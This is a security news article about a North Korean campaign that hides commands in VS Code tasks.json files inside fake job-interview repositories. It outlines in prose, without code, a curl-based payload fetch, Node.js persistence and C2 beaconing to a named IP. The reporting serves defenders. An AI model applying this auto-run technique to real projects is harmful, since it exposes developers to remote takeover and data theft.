North Korean threat actors have significantly evolved their attack strategies, now extensively abusing Microsoft Visual Studio Code to execute malicious payloads on victim systems. This “Contagious Interview” campaign represents a concerning shift from traditional social engineering to exploiting trusted development environments, targeting developers directly with sophisticated malware delivery.
Researchers have identified that these advanced persistent threats (APTs) are embedding malicious commands within Visual Studio Code’s configuration files, bypassing the need for suspicious email links or click-through actions previously observed. This evolution allows for direct malware execution upon a developer unknowingly opening a compromised repository and granting repository trust, a standard workflow step.
Hackers Exploiting Visual Studio Code for Malware Execution
The exploitation of Visual Studio Code leverages its legitimate functionality to stealthily deliver malicious code. The attack chain begins when developers clone repositories, often disguised as recruitment assignments or technical job interviews, hosted on platforms like GitHub or GitLab. Within these repositories, attackers embed commands within the `tasks.json` configuration file.
When a developer opens such a repository in Visual Studio Code and grants trust, the application automatically processes the `tasks.json` file. This process can trigger the execution of arbitrary code on the victim’s system without explicit user intervention beyond the initial trust prompt. This sophisticated approach circumvents many traditional security measures designed to detect and block external threats.
Jamf analysts and researchers observed in December that attackers are further refining these techniques. They discovered dictionary files within these repositories containing heavily obfuscated JavaScript code. This JavaScript executes silently when a malicious repository is opened, and attackers are employing increasingly advanced obfuscation methods to evade detection and analysis by security tools.
The Infection Mechanism and Execution Flow
The infection mechanism within this campaign is designed for stealth and persistence. Once a developer clones and opens a malicious Git repository, the malware on macOS systems initiates a background shell command. This command, combining `nohup` and `bash` with `curl`, is used to download a JavaScript payload from infrastructure hosted on Vercel.
The downloaded payload is executed directly within the Node.js runtime. This crucial detail allows the malicious process to continue running even if the Visual Studio Code application itself is closed. This persistence mechanism is highly effective as it operates independently of the editor’s primary process, making it more difficult to terminate.
Following successful execution, the JavaScript payload establishes a persistent connection to a command-and-control (C2) server. Reports indicate this C2 server is located at the IP address 87.236.177.93, and the malware beacons to it every five seconds. The initial data transmitted includes critical system information such as the hostname, MAC addresses, and operating system details, which are then sent to the attackers for further tasking.
The malware’s design incorporates a persistent execution loop, enabling it to receive and execute additional JavaScript instructions from the C2 server. This capability allows attackers to maintain long-term access to the compromised systems and perform a wide range of malicious activities. The sophistication of this campaign highlights the evolving tactics of state-sponsored threat actors who are increasingly leveraging legitimate software tools for malicious purposes.
Developers are advised to exercise extreme caution when cloning repositories from unknown or untrusted sources. It is crucial to meticulously review the contents of any repository before marking it as trusted, particularly scrutinizing `tasks.json` files for any unusual or suspicious configurations that might indicate malicious intent. Advanced threat detection solutions capable of monitoring code editor behavior and network communications can also provide an additional layer of defense against such sophisticated attacks.